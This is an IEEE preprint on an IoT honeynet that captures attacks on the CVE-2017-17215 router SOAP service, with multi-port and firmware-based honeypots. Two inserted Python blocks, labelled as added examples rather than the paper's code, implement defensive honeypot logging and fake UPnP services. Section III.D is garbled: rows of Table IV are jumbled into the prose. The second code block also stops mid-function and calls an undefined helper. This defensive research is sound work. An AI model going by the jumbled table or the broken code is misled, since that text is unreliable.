
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of Things Journal

An IoT Honeynet based on Multi-port Honeypots for Capturing IoT attacks

Weizhe Zhang, Bin Zhang, Ying Zhou, Hui He, Zeyu Ding

Abstract—Internet of Things (IoT) devices are vulnerable to attacks because of their limited network resources and complex operating systems. Thus, the honeypot is a good method of capturing malicious requests and collecting malicious samples, but it is rarely used on the IoT. Accordingly, this research implements three kinds of honeypots to capture malicious behaviors. First, on the basis of the CVE-2017-17215 vulnerability, we implement a medium-high interaction honeypot that can simulate a specific series of router UPnP services. It has functions such as service simulation, log recording, malicious sample download, and service self-check. Second, given the limited details available for the simulated UPnP service and to help the honeypot respond to unrecognizable malicious requests, we use the actual IoT device firmware that matches the vulnerability to build a high-interaction honeypot. In addition, we investigate the most exposed SOAP service ports and design a corresponding multi-port honeypot to improve the capacity of the honeynet, providing a hybrid service from a real device and simulating honeypots. Docker, which reduces the volume of the honeypot and realizes the rapid deployment of the honeynet, encapsulates all these honeypots. Moreover, the honeynet control center is designed to distribute commands and transfer files to each physical node in the honeynet. We implemented the proposed honeynet system and deployed it in practice. We have successfully caught many unknown malicious attacks that are absent from VT, which proved the effectiveness of the proposed framework.

Index Terms—Internet of Things (IoT), honeypot, honeynet, SOAP, Multiport

Weizhe Zhang is with the School of Science and Technology, Harbin Institute of Technology, Harbin, China. He is also with the Cyberspace Security Research Center, Peng Cheng Laboratory, Shenzhen, China (e-mail: wzzhang@hit.edu.cn).
Bin Zhang is with the Cyberspace Security Research Center, Peng Cheng Laboratory, Shenzhen, China (e-mail: bin.zhang@pcl.ac.cn).
Ying Zhou is with the Cyberspace Security Research Center, Peng Cheng Laboratory, Shenzhen, China (e-mail: zhouy01@pcl.ac.cn).
Hui He is with the School of Science and Technology, Harbin Institute of Technology, Harbin, China (e-mail: hehui@hit.edu.cn).
Zeyu Ding is with the School of Science and Technology, Harbin Institute of Technology, Harbin, China (e-mail: dzydyx@gmail.com).
This work is supported by the Key Research and Development Program for Guangdong Province 2019B010136001, the Peng Cheng Laboratory Project of Guangdong Province PCL2018KP004 and PCL2018KP005. (Corresponding author: Weizhe Zhang.)
Copyright (c) 2019 IEEE. Personal use of this material is permitted. However, permission to use this material for any other purposes must be obtained from the IEEE by sending a request to pubs-permissions@ieee.org.

I. INTRODUCTION

The Internet of Things (IoT) promotes smart and convenient living. According to a survey [1], the number of IoT devices has surpassed 10 billion. However, huge security breaches happen in the IoT. In 2018, a hacker organization infected more than ten thousand IoT devices through two IoT vulnerabilities, CVE-2017-17215 and CVE-2014-8361, and even rented out distributed denial of service (DDoS) attack services on the darknet. Another botnet, Hide'N Seek (HNS), infected nearly a thousand IoT devices by exploiting vulnerabilities through several remote commands, which have since been disclosed. The IoTroop botnet drew on part of Mirai (a type of botnet) and launched three consecutive large-scale DDoS attacks on financial institutions on January 28, 2018. Moreover, firmware vulnerabilities in the MikroTik router have resulted in more than 200,000 devices mining without the user's knowledge.

The vulnerabilities and the number of IoT devices render IoT attacks easier than traditional cyber-attacks. Existing IoT devices are vulnerable to various physical attacks [22], [29], such as those on position-based services [32], [33], [34]. Therefore, studying lightweight IoT devices as well as communication encryption schemes is crucial in ensuring their security [23]. The traditional sandbox and other security protection technologies [31] cannot be realized on IoT devices because of the limited resources of sensor devices and their unreliable systems [24]. Consequently, vulnerabilities of the system are easily found via firmware analysis [25]. It is also vulnerable to side-channel attacks due to the stability of its equipment location [26]. The security threats to communication networks are dominated by traditional cyber-attacks, namely, man-in-the-middle attacks, data theft and replay, counterfeiting, and so on. In addition, UPnP, which is extensively used in IoT devices, also brings many vulnerabilities. IoT devices can use DHCP to automatically access the Internet and then use the SSDP protocol to discover devices until the control device completes the task [28].

To protect IoT devices, monitoring the malicious behavior of the IoT and promptly identifying threats are important. We must analyze the malicious behavior, the characteristics of the data, as well as the characteristics of attacks [30], which require us to obtain malicious samples of the IoT first. Honeypots and honeynets are effective methods of capturing malicious requests and collecting malicious behavior samples. A honeypot induces the attack by arranging some hosts, network services, or information, thereby capturing the attack behavior, analyzing the tools and methods adopted by the attacker, and inferring the attack intention and motivation. The honeypot can help the defense party clearly understand the security threats and enhance the security protection capability of the real system.

Yegneswaran et al. [15] proposed a situational awareness model based on honeynet. They deployed a honeynet system with a MySQL database to save and analyze data, and the Bro NIDS is used for analysis. After six months of data

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.

collection, the experimental results proved that the system could detect botnet scanning and worm outbreaks.

Ma et al. [16] generated a highly personalized and predictive blacklist for each network by sharing historical attackers, which are captured by honeynets in each network. Accordingly, different networks can collaboratively detect new attackers because of the shared attacker information. The most likely attacker in the future will be identified on the basis of the attackers' historical relevance. The defense strategy undergoes a relatively active realization, and the experimental results show that this method can produce an accurate blacklist.

Yongli et al. [17] proposed a new honeynet model, BRHNS (based on Realm Honeynet), to solve the problem of non-cooperation and weak real-time performance in honeynets. BRHNS utilized the cooperation between Realms and shared the new intrusion rules. It also updated the Intrusion Detection System (IDS) rule library in real time and improved the detection efficiency of the IDS. Accordingly, it effectively reduced the workload of the honeynet and improved its efficiency. Experimental results show that BRHNS is much faster than formal honeynets.

A honeypot captures many attacks that are difficult to handle manually; therefore, some researchers proposed using data mining techniques to analyze the recorded traffic and extract useful information. Ghourabi et al. [18] provided a data analysis tool on the basis of a clustering algorithm. The main idea is to extract useful information from data captured by the honeypot. The data are then clustered by the Density-Based Spatial Clustering of Applications with Noise algorithm to classify the captured packets. Then, a human expert verifies the extracted suspicious packets. This solution is useful for detecting novel routed attacks.

Huang et al. [19] indicated that positive interactions on the honeynet could yield mature attack samples, but such a honeynet is highly expensive and poses high risks against the development of the honeynet. Therefore, they applied a Semi-Markov Decision Process to describe an attacker's random transitions and their stay time in the honeynet. Subsequently, they weighed the rewards and risks. Adaptive long-term participation policies have also been developed to demonstrate risk avoidance, cost-effectiveness, and time efficiency. Numerical results show that this adaptive interaction strategy can be used to attract attackers quickly, with the capacity to obtain valuable threat information over a long time with a low penetration rate.

However, the existing honeynet systems are designed for the traditional Internet and are inappropriate for IoT systems. In addition, owing to the changing form of the attack, we must design a new honeypot to capture the attacks. To capture a complete attack and avoid hackers stopping due to long periods of unresponsiveness, this research proposes a medium-high interactive honeypot that uses the internal execution of the vulnerability service as a black box and only returns the output. Such a proposition avoids the simulation of the service, reduces the workload of the security personnel, and improves the capability of the honeypot to interact with the external network. Accordingly, the current study develops a high-interaction honeypot running real IoT firmware. When the high-interaction simulation honeypot fails to respond to the attacker's request, the process is handed over to the real honeypot and returns the real output. This research also designed a multi-port honeypot, using a multi-threaded running high-interaction honeypot. Then, any port can return the IoT device configuration file according to the given fingerprint information to simulate the real device service. The current study proposed a novel architecture of honeypot and honeynet, with the following contributions:

• We build an interconnected and collaborative honeynet for the IoT network. The system simulates IoT device services to monitor the security status of the IoT in real time. It can discover and record malicious behaviors and collect malicious samples of the IoT.
• In the proposed hybrid honeynet, we develop a medium-high interactive honeypot together with a high-interaction honeypot using real firmware services based on the popular CVE-2017-17215 vulnerability. Moreover, we design a multi-port interactive honeypot on the basis of the most exposed SOAP port in 2018.
• We encapsulate the honeypots with Docker for the proposed honeynet to ensure the security of the physical machine and facilitate rapid deployment.

The rest of this work is structured as follows. The next section reviews related work. The method section depicts the proposed honeypots and honeynet. Consecutively, we dissect the conducted evaluation and the activity observed with the honeynet in the evaluation section. Finally, we conclude our work and future outlook in the final section.

II. RELATED WORK

A. Honeypot

Niels [3] proposed a classic honeypot framework, Honeyd; the latter can simulate real computers under the network layer as shown in Fig. 1. It consists of the traffic allocation units, protocol processing units, and fingerprint matching units. The traffic allocation units send the packet to an established honeypot or a default route. The protocol processing units can simulate the TCP, UDP and ICMP protocols, and so on. The fingerprint matching units are used to fight fingerprint identification tools, which can prevent hackers from discovering the honeypot. The free IP addresses of the current network can be regarded as the virtual addresses of the honeypot, and many honeypots can be deployed on a single host because it is lightweight.

Paul et al. [4] proposed another classic honeypot framework called Nepenthes. Nepenthes simulates only parts of the protocol instead of a complete one, and it adopts a ShellCode detection mechanism to discover injected malicious code. The framework is replaced by Dionaea [5], which is implemented in the Python language to simulate vulnerability services and capture malicious attacks.

Rist et al. [6] developed a Web honeypot called Glastopf, which attempts to respond directly to the requestors, thus avoiding the simulation of the service and reducing the workload of security personnel. Based on this work, the Glastopf regards the CVE-2017-17215 vulnerability as a black box, which shall only respond to the attacker. The limitations


Fig. 1. The work flow of Honeyd (blocks: External network, Network Port, Flow Distribution Unit, Fingerprint Matching Unit, Protocol Processing Unit, Database)

of this method prompt the current research to develop a high interactive honeypot that operates real IoT firmware. When medium-high-interaction honeypots cannot respond to an attacker's request, the process will be handed over to the high-interaction honeypot.

In the field of IoT, scholars have begun to study the honeynet system to collect malicious IoT behaviors. YMP et al. [11] simulated the TELNET login process to create an IoT honeypot that attracted TELNET attacks against IoT devices with different CPU architectures. While collecting data through the deployed honeynet, they discovered five different malware families, the largest of which can infect up to nine different IoT devices with different CPU architectures. Anirudh et al. [12] designed a honeypot model as a bait for the main server, thereby shifting the DoS attacks in the IoT network and improving the performance of the IoT device. Muhammad et al. [13] introduced an IoT honeypot framework based on the UPnP protocol. They used device description files to automate honeypots, which allows multiple instances to be deployed on a single physical machine. We refer to this architecture, select device files to make honeypots, and further capture IoT malicious attacks. Hansen et al. [14] extended the concept of the IoT honeypot and presented a honeynet system with a hybrid of virtual and real devices. The system used machine learning algorithms for traffic analysis and predicted the opponent's next activity.

Unlike the Internet, which is based on the HTTP protocol, the IoT typically uses the lighter SOAP protocol for exchanging information in a distributed computing environment. Dai et al. [20] designed and implemented a SOAP-based transaction management protocol (TMP), including supported operations, interface definitions for these operations, implementation structures, and processing of the protocol. SOAP-based TMP can make the most of extensively used technologies such as HTTP, XML, and SOAP, and thus can have extensive use. Riedel et al. [21] transformed the lengthy parts binding with SOAP to the semantics of a specific network platform. Taking Radio Frequency Identification technology as an example, it converts the semantics of a Remote Procedure Call into a reader query.

B. Honeynet

Spitzner et al. [7] proposed the honeynet due to the limitations of a single virtual honeypot. The honeynet system is a network that includes multiple honeypots as well as multiple deployment nodes. It is a network that consists of behavior recording, alarm and analysis, management communication, and other mechanisms. It contains real systems to capture further attacks, facilitating the understanding of hackers' attack methods and security incidents. Artail et al. [35] proposed a hybrid honeynet system to improve the IDS, in which low- and high-interaction honeypots are all deployed to protect the network.

Curran et al. [8] pointed out several major characteristics of a honeynet: (1) Defects and vulnerabilities in certain areas, as well as some insecure measures that leave the honeynet open to attacks by hackers, frequently exist in a honeynet. (2) A honeynet is not a service network, thereby rendering traffic monitoring in the honeynet system unsafe. (3) The honeynet system should be capable of recording any connections, requests, responses, services, logs, and so on, for the security personnel to perform subsequent analysis. (4) Every honeypot in the honeynet system is under strict control; it can be traced and restored. (5) Security measures between the honeynet system and the external network must be in place to prevent malicious behaviors after the honeypot is compromised. Moreover, Kevin et al. believed that the honeynet system does not need to actively lure attacks, which is conducive to ensuring the authenticity of the data obtained by the honeypot.

For conventional honeynets, many scholars have conducted research on intrusion detection and data analysis. Hu [9] proposed an attack behavior analysis method based on an attack graph. He used the attack graph for honeynet security detection and introduced the key element of network topology; he improved the clustering algorithm to classify the alarms. In addition, he improved the DFS encoding technology and migrated it to the field of directed graphs. Finally, Hu synthesized the network and topology information to identify the warning information. For data analysis in protected content, for example, position-based services and queries are highly dependent on processing speed with content security. Sangaiah et al. [34] used machine learning for roaming PBS users. Medhane et al. [33] proposed a parallel architecture in a position monitoring system, and a position confidentiality conserving algorithm is used to protect the content [32].

Agrawal et al. [10] proposed a method for monitoring rogue wireless access based on a shadow honeynet as shown in Fig. 2. The concept of a shadow honeynet comes from a shadow honeypot, which refers to a copy of the software or system actually intended to be protected. The copy shares the internal state with the subject. The framework consists of three parts, namely, a filtering engine, an anomaly sensor, and a shadow honeypot.

In the field of IoT, Oza et al. [36] implemented an authorization mechanism in a honeynet, thereby enabling them to solve the issue of man-in-the-middle attacks in the IoT. Ammar et al. [37] proposed the honeyIo3 model in ICS/SCADA systems, and


Fig. 2. Work principle of shadow Honeynet (blocks: Protected system, Protected service address space, Process state, State rollback, Shadow honeypot, Intrusion Sensor, Filter, External network)

Fig. 3. Composite honeynet system architecture (blocks: Container warehouse; Physical Host A, B and C, each with a Master controller, a CVE honeypot and a SOAP multiport honeypot; Hardware honeypot; General Service; Master Controller; Internet)

it provided the honeypot security tool with high availability; it contained three IoT devices and is implemented using an office router and one public IP address.

The honeynet module in this work focuses on the SOAP protocol in the UPnP protocol stack of the IoT, which raises serious security concerns. The CVE-2017-17215 vulnerability and the most exposed SOAP port in 2018 are used to make honeypots. The latest IoT malicious samples since 2017 have been collected and rigorously screened. Therefore, this research has obtained highly authentic, timely, and valuable data.

III. METHODOLOGY

To monitor malicious behaviors of the IoT, we proposed a hybrid honeynet as shown in Fig. 3, containing three kinds of honeypots. First, we designed a medium-high interactive honeypot. Second, we designed a high-interactive honeypot that provides a real service; hence, a mixed service of real equipment and simulated honeypot is formed. Third, for the most exposed SOAP ports in 2018, this research analyzes and produces a multi-port honeypot. Finally, an IoT honeynet system is implemented by deploying these different honeypots to multiple nodes. With control centers for command distribution and file transfer, we complemented the honeynet system with Docker.

A. Overall Architecture

To establish a coordinated honeypot system and increase the capacity of cluster deployment, this study designs a control center. The script in the control center is used for file distribution and command transfer; the honeypot response message is obtained and recorded in the output log. The control script uses a Python multi-threaded design to connect to the remote hosts of the IP list using the paramiko library. The script can realize the function of transferring files and can also use the Secure Shell key to connect to the host and execute the given commands to open and close the honeypot as well as monitor the host system.

As shown in Fig. 3, the honeynet system deploys honeypots to multiple physical nodes, where each node supports both single and multi-honeypot deployments and a master program to manage the honeypots on it. When the medium-high interaction honeypot cannot resolve the external request, it will send a request to the master node, and the master node notifies the high-interaction honeypot running the real firmware to respond. The control nodes interact with the honeynet nodes so that the honeypots are combined by a single individual into a whole honeynet system.

B. Medium-high Interactive Honeypot

In this subsection, we develop a honeypot for a router's remote code injection vulnerabilities, which provide unsecured SOAP services for device upgrades. This vulnerability can result in unauthorized access and remote code injection. It can be utilized to execute arbitrary commands remotely by sending a specially constructed request packet to port 37215, monitored by the UPnP service of routers.

TABLE I
CVE-2017-17215 VULNERABILITY INFORMATION

Utilized vulnerability | Occupied port | Request path | Infected Equipment Model
CVE-2017-17215 | 37215 | /upnpdev.xml/ctrlt/DeviceUpgrade-1 | B660, HG231f, HG531sV1, HG531V1, HG630, YAbox

First, we collect the IoT devices and their configuration information affected by this vulnerability, as shown in Table I. We develop a honeypot on the basis of this vulnerability. The structure of the proposed honeypot is as follows: the core module of the honeypot, the honeypot Daemon module, the Daemon process service, the honeypot monitor, and other modules.


Fig. 4. Relations between pot-core parts (blocks: Core Service, Log Server, Soap Server, Samples Deal, Webhook; the Hacker's REQUEST ATTACK reaches the Soap Server, which RETURNs the RESPONSE)

The framework can ensure the stability of honeypot operation, and it can promptly discover and restart the honeypot when the honeypot service is abnormal. It can also supply some log information that cannot be recorded by the honeypot service, as well as assist in debugging and troubleshooting problems.

1) Core Module of the Honeypot: The honeypot core module is the core service of a honeypot, which provides simulated IoT devices and services with vulnerabilities. It consists of the SOAP service module, web service module, log module, and malicious sample processing module. Fig. 4 illustrates the relationship between them.

The core service module provides an external interface for every module except the honeypot core module. It monitors by opening the log and SOAP servers, and it sets the timer_handle_fun function of the log module as a timer callback. The function recursively calls itself and checks the current time, ensuring that all logs are recorded daily in a local directory.

The log module defines UDPHandler to monitor the front-end SOAP service module, and it analyzes the request information packaged in JSON format. Subsequently, the success information is returned. If a malicious sample download is found in the request, the wget_virus_in_url function in the malicious sample processing module will be called to download the sample. This file also provides the interface functions for opening the log server and timing the output log for the core service module. Table II presents the logs defined as GET, POST and others, and the corresponding format.

TABLE II
LOG FORMAT

Field Name | Meaning | Value
log type | Malicious Request Type | get, post, other
time | Request Time | time.ctime()
timestamp | UTC Time stamp | time.time()
src ip | Request Source IP | JSON Packet Analysis
sensor ip | Honeypot External IP | requests.get("http://jsonip.com").json()["ip"]; socket.gethostbyname(socket.gethostname())
des port | Destination Port | 37215
protocol | Protocol | HTTP
path info | Request Path | JSON Packet Analysis
query string | Get Query String | JSON Packet Analysis
user agent | Requester banner | user agent

The SOAP service module calls the handler defined in the web service module and the make_server function in wsgiref.simple_server, and it opens the SOAP server at port 37215 to simulate the SOAP service with vulnerabilities of real IoT equipment and attract hackers.

The handler function for the SOAP vulnerability is defined in the web service module, and the constructed fake file is returned by wsgi. For the CVE-2017-17215 vulnerability, the injection code accesses port 37215 of the web service. Table III shows the banner information. The send_log function is also defined in this section to send a request record packaged in JSON format to the log server. In this part, a socket is used for the communication between the web and log servers. The web server waits for the message the log server returns. If it receives an error message, it retransmits the same message. If the number of retransmissions exceeds the limit, the log server is considered down.

The malicious sample processing module is responsible for downloading and processing malicious samples, where the wget_virus_in_url function provides an external interface for calling the sample download function. In the function, the download features are extracted by regular expressions. After extracting the download resource information, the download_virus_by_requests function is called to download samples. The function first searches the output directory for the sample name. If the sample name exists, the renaming_duplicate_virus function is called to add a suffix to the sample name to rename it. Then, the function calls the requests library for sample downloads. If the sample download is successful, the deep_analyze function is further called for an in-depth analysis, that is, the sample content is analyzed to determine whether a "large Trojan downloaded by small Trojan" situation occurs. This part also defines the clear_duplicate_sample function to deduplicate samples, which calculates the hash value of the sample by calling the md5sum function.

TABLE III
CVE-2017-17215 VULNERABILITY BANNER FORMAT

Field Name | Meaning | Value
Content-Length | Return Content Length | 259
Date | Time | Mon, 26 Nov 2018 13:05:09 GMT
EXT | JS Framework | Empty
Content-Type | File Type | text/xml; charset="utf-8"
Server | Device Type | Linux UPnP/1.0 Huawei-ATP-IGD
WWW-Authenticate | Abstract Authentication | ...nonce="2da490f624b01151f1feabad77c1a122", qop="auth", algorithm="MD5"
return data | SOAP Service Messages | this is end

The SoapXML folder provides the SOAP device information modeled after the vulnerable router. It includes the device type, device model, device URL, Universally Unique Identifier, service list, service address, serial number, and so on. This file is used to respond to SOAP service scans of port 37215, returning real device configuration information.
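The core module of subsection 1), as an added example that is not the paper's code: a wsgiref handler on port 37215 that answers with the Table III banner headers, a send_log that ships the Table II record to the log server over UDP with retransmission, a UDPHandler on the log-server side that parses the JSON and acknowledges, regular-expression extraction of download URLs from the request body, and md5-based sample deduplication. The log-server address, the "Digest" scheme prefix, the SOAP response body and the sample request are assumptions or constructed values; the actual sample download is left out and only the URL is recorded.

```python
import hashlib, io, json, os, re, socket, time
from socketserver import BaseRequestHandler, UDPServer
from wsgiref.simple_server import make_server

LOG_SERVER = ("127.0.0.1", 37216)   # assumed log-server address (the paper gives none)
URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s\"'<>|;&)]+")   # download links in a request

# Response headers modelled on Table III (wsgiref adds the Date header itself). The
# "Digest" scheme is an assumption; the table shows only the nonce/qop/algorithm part.
BANNER = [
    ("EXT", ""),
    ("Content-Type", 'text/xml; charset="utf-8"'),
    ("Server", "Linux UPnP/1.0 Huawei-ATP-IGD"),
    ("WWW-Authenticate", 'Digest nonce="2da490f624b01151f1feabad77c1a122", qop="auth", algorithm="MD5"'),
]
# Constructed stand-in for the fake file the web service module returns ("this is end")
FAKE_BODY = (b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/'
             b'soap/envelope/"><s:Body>this is end</s:Body></s:Envelope>')

def make_record(environ, body, sensor=None):
    """Table II log record, plus any download URLs spotted in the request body."""
    method = environ.get("REQUEST_METHOD", "").lower()
    return {
        "log type": method if method in ("get", "post") else "other",
        "time": time.ctime(),
        "timestamp": time.time(),
        "src ip": environ.get("REMOTE_ADDR", ""),
        # the paper resolves this via jsonip.com or socket.gethostbyname(); taken from environ here
        "sensor ip": sensor or environ.get("SERVER_NAME", ""),
        "des port": 37215,
        "protocol": "HTTP",
        "path info": environ.get("PATH_INFO", ""),
        "query string": environ.get("QUERY_STRING", ""),
        "user agent": environ.get("HTTP_USER_AGENT", ""),
        "download urls": URL_RE.findall(body),
    }

def send_log(record, server=LOG_SERVER, retries=3, timeout=2.0):
    """Ship the JSON record over UDP; retransmit until the log server answers b'ok'."""
    data = json.dumps(record).encode()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for _ in range(retries):
            s.sendto(data, server)
            try:
                reply, _ = s.recvfrom(64)
            except socket.timeout:
                continue
            if reply == b"ok":
                return True
    return False                      # retry limit hit: log server considered down

class UDPHandler(BaseRequestHandler):
    """Log-server side: parse the JSON record, append it to today's log file, ack."""
    def handle(self):
        data, sock = self.request
        try:
            record = json.loads(data.decode())
        except ValueError:
            sock.sendto(b"error", self.client_address)
            return
        with open(time.strftime("honeypot-%Y%m%d.log"), "a") as f:
            f.write(json.dumps(record) + "\n")   # the sample download would be triggered here
        sock.sendto(b"ok", self.client_address)

def store_sample(content, out_dir="samples"):
    """Keep a downloaded sample under its md5 name; an already-seen hash is dropped."""
    digest = hashlib.md5(content).hexdigest()
    path = os.path.join(out_dir, digest)
    if os.path.exists(path):
        return path, False
    os.makedirs(out_dir, exist_ok=True)
    with open(path, "wb") as f:
        f.write(content)
    return path, True

def make_app(logger=send_log, sensor=None):
    """WSGI handler for port 37215: log every request, then answer with the banner."""
    def app(environ, start_response):
        try:
            length = int(environ.get("CONTENT_LENGTH") or 0)
        except ValueError:
            length = 0
        body = environ["wsgi.input"].read(length).decode(errors="replace") if length else ""
        logger(make_record(environ, body, sensor))
        start_response("200 OK", BANNER + [("Content-Length", str(len(FAKE_BODY)))])
        return [FAKE_BODY]
    return app

def sample_environ(method, path, body=b"", src_ip="198.51.100.9", user_agent="Mozilla/5.0"):
    """Constructed WSGI environ (not captured traffic) for exercising the app offline."""
    return {"REQUEST_METHOD": method, "PATH_INFO": path, "QUERY_STRING": "",
            "REMOTE_ADDR": src_ip, "HTTP_USER_AGENT": user_agent, "SERVER_NAME": "honeypot",
            "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}

if __name__ == "__main__":
    # the log server runs separately: UDPServer(LOG_SERVER, UDPHandler).serve_forever()
    make_server("", 37215, make_app()).serve_forever()
```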


The functions of the above parts work together to form the core of the honeypot, complete the basic functions of the honeypot, and simulate the real IoT devices and services.

2) Honeypot Daemon: This module defines a base class Daemon to open, close, restart, and initialize. It also provides the external interface to control the honeypot.

Considering that the Daemon class is detached from the terminal, the standard information flow is redirected to an empty file. The default value of the pidfile attribute is "/tmp/tmp.pid", which saves the process number of the current process. The system can determine whether the process already exists to ensure singleton mode.

The function daemonize is used to initialize the Daemon instance. First, whether it already exists is determined by the pidfile; then, the buffer is flushed, and the standard streams are discarded. Finally, the pidfile is guaranteed to be removed at the end of the process through the atexit.register and signal.signal functions. The static function throws a SystemExit exception. The start function calls the daemonize function to initialize, catches the abnormal operation, and outputs an error message. The stop function takes a process number from the pidfile and kills it. The restart function calls the stop and start functions in turn to restart.

3) Daemon Service: The class MyDaemon is defined in the Daemon module, which inherits the Daemon class in the scar library. Then, it starts the honeypot core service when the instance is in operation. In the main function, an instance of the class MyDaemon is created. The start of the honeypot daemon and the core of the honeypot are controlled by the corresponding functions of the instance. The class PotCore is also defined to provide an interface to the daemon externally. The main function is called by calling the subprocess.Popen function. That is, the instance of the class MyDaemon is not called directly from outside, but the instance of PotCore is called. The instance of PotCore calls the instance of MyDaemon through its own method to implement the indirect call.

4) Honeypot Monitor: The Honeypot Monitor module calls the timer_handle_web_detect_fun function to check the honeypot function. This function regularly accesses the honeypot

C. High Interactive Honeypot

The medium-high interactive honeypot described in the previous section simulates the SOAP protocol based on wsgi. However, when the simulated protocol fails to process requests, an attacker is likely to interrupt the connection because the expected response is not received. Consequently, the honeypot fails to capture the subsequent injection code and malicious sample. Therefore, a high interactive honeypot is developed, using completely realistic exploitable IoT firmware, to handle the requests that cannot be processed by the medium-high interactive emulation honeypot. Moreover, running the captured malicious samples is possible because of the integrity of its services.

The qemu environment is used to assemble the kernel file vmlinux-2.6.32-5-4kc-malta and the disk image debian-squeeze-mips-standard.qcow2. After booting successfully, the change root command is used to switch the root directory and run the UPnP and mic services. It provides the same SOAP service as a real-world vulnerable IoT device. The device firmware-based SOAP service honeypot can be implemented by adding the above request record and sample download modules to the system.

D. Multi-port Honeypot

The SOAP vulnerability involves UPnP's device architecture, the SOAP service, and the HTTP protocol. Attackers use multiple ports to attack. To collect these samples, we obtain the banner information of several IoT devices affected by the vulnerability through the collection of IoT device information. The latter is used to match the device type and select the response content of the malicious request. Table IV describes the device information.

TABLE IV
LOG FORMAT

Port Number | Banner | Device Files
2048 | Net-OS 5.xx UPnP/1.0 | gatedesc.xml
3183 | Net-OS 5.xx UPnP/1.0 | gatedesc.xml
5000 | nginx | desc-DSM-eth0.xml
5000 | Linux/2.6.12 UPnP/1.0 | Public-UPNP-
simulation service, detects its running state, determines ex- NETGEAR-UPNP/1.0 gatedesc.xml
ceptions such as timeouts and connection errors, and calls the 5000 1.11.0-R UPnP/1.0 MiniUP- rootDesc.xml
nPd/1.4
PotCore class object to restart honeypot when an exception 5500 Tenda UPnP/1.0 rootDesc.xml
occurs. The start-service interface is also provided for external miniupnpd/1.0
calls. 5555 RomPager/4.07 UPnP/1.0 DeviceDescription.xml
35510 Net-OS 5.xx UPnP/1.0 gatedesc.xml
5) Other Modules: The configuration module is the hon- 49152 Linux/2.6.32.11, UPnP/1.0, gatedesc.xml
eypot configuration file, which defines some parameters and Portable SDK for UPnP
reduces the workload of secondary development. Specifically, devices/1.6.6
52869 ipos/7.0 UPnP/1.0 TL- igd.xml
it includes honeypot name, log output directory, honeypot core, WR841N/11.0
honeypot self-check delay, and self-check cycle. 52869 miniupnpd/1.5 UPnP/1.5 picsdesc.xml
52881 OS 1.0 UPnP/1.0 Realtek/V1.3 simplecfg.xml
main.py is the entry of the entire honeypot framework. It 54147 Net-OS 5.xx UPnP/1.0 gatedesc.xml
calls the start method of the PotCore class instance to open 55567 Net-OS 5.xx UPnP/1.0 gatedesc.xml
the daemon and then calls the self-check.start-service of pot-
monitor function to start the SOAP service self-check. To implement the multi-port honeypot, this research adopts
Tc.sh calls the tc tool to limit traffic and prevent the the threading module to achieve multi-threaded operation.
honeypot from being compromised due to DDoS attacks. The Then, any port can return the IoT device configuration file
main.py is called in this research and is the outermost entrance according to the given fingerprint information to simulate the
of the honeypot. real device service.
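The multi-port honeypot just described and the Honeypot Monitor of item 4) are easiest to see together in code. The following Python is an added example written for this page, not the authors' code: it opens one listener thread per port, answers with the banner and device file of three rows of Table IV (the XML bodies are constructed stand-ins for the real description files), logs every request, and provides a self-check that probes each port and rebinds any listener that no longer answers, which is what the monitor does through PotCore when it sees a timeout or connection error. Port 0 in an entry means "any free port", so the block can be exercised without root or the real port numbers.

```python
import http.client
import logging
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Three fingerprints copied from Table IV: (listening port, banner, device description file).
# Port 0 means "any free port", convenient for tests; a deployment uses the real port numbers.
DEVICES = [
    (5000, "Linux/2.6.12 UPnP/1.0 NETGEAR-UPNP/1.0", "Public-UPNP-gatedesc.xml"),
    (52869, "ipos/7.0 UPnP/1.0 TL-WR841N/11.0", "igd.xml"),
    (49152, "Linux/2.6.32.11, UPnP/1.0, Portable SDK for UPnP devices/1.6.6", "gatedesc.xml"),
]

def device_description(banner, filename):
    # Constructed stand-in; a real honeypot serves the description file captured from the device.
    return ('<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0"><device>'
            f"<friendlyName>{filename}</friendlyName><modelDescription>{banner}</modelDescription>"
            "</device></root>").encode()

class FakeDeviceHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.0"

    def version_string(self):           # value of the Server: header, i.e. the per-port banner
        return self.server.banner

    def log_message(self, fmt, *args):  # one log record per request (port, peer, request) instead of stderr
        self.server.log.info("port=%d peer=%s %s", self.server.server_port, self.client_address[0], fmt % args)

    def do_GET(self):
        if self.path.lstrip("/") != self.server.desc_file:
            self.send_error(404)        # unknown path: logged, then answered as a real device would
            return
        body = device_description(self.server.banner, self.server.desc_file)
        self.send_response(200)
        self.send_header("Content-Type", "text/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

class PortHoneypot(ThreadingHTTPServer):
    daemon_threads = True
    allow_reuse_address = True          # lets the monitor rebind the port right after a crash

    def __init__(self, addr, banner, desc_file, log):
        self.banner, self.desc_file, self.log = banner, desc_file, log
        super().__init__(addr, FakeDeviceHandler)

    def server_bind(self):              # skip HTTPServer's reverse-DNS lookup of the bind address
        socketserver.TCPServer.server_bind(self)
        self.server_port = self.server_address[1]

class MultiPortHoneypot:
    def __init__(self, devices, host="127.0.0.1"):
        self.host, self.log = host, logging.getLogger("honeypot")
        self.pending, self.servers, self.devices = list(devices), {}, {}

    def _listen(self, port, banner, desc):
        srv = PortHoneypot((self.host, port), banner, desc, self.log)
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        self.servers[srv.server_port] = srv
        self.devices[srv.server_port] = (banner, desc)
        return srv.server_port

    def start(self):
        """Bind every configured port in its own thread; returns the port numbers actually bound."""
        return [self._listen(*entry) for entry in self.pending]

    def stop(self, port):
        """Tear down one listener (stands in for the core service being killed)."""
        srv = self.servers.pop(port)
        srv.shutdown()
        srv.server_close()

    def check_and_restart(self):
        """One self-check cycle: probe every port, restart the dead ones, return their numbers.
        A timer thread calling this every self-check cycle is the monitor described in the text."""
        restarted = []
        for port, (banner, desc) in list(self.devices.items()):
            if probe(self.host, port) is None:
                self.log.warning("port %d not answering, restarting", port)
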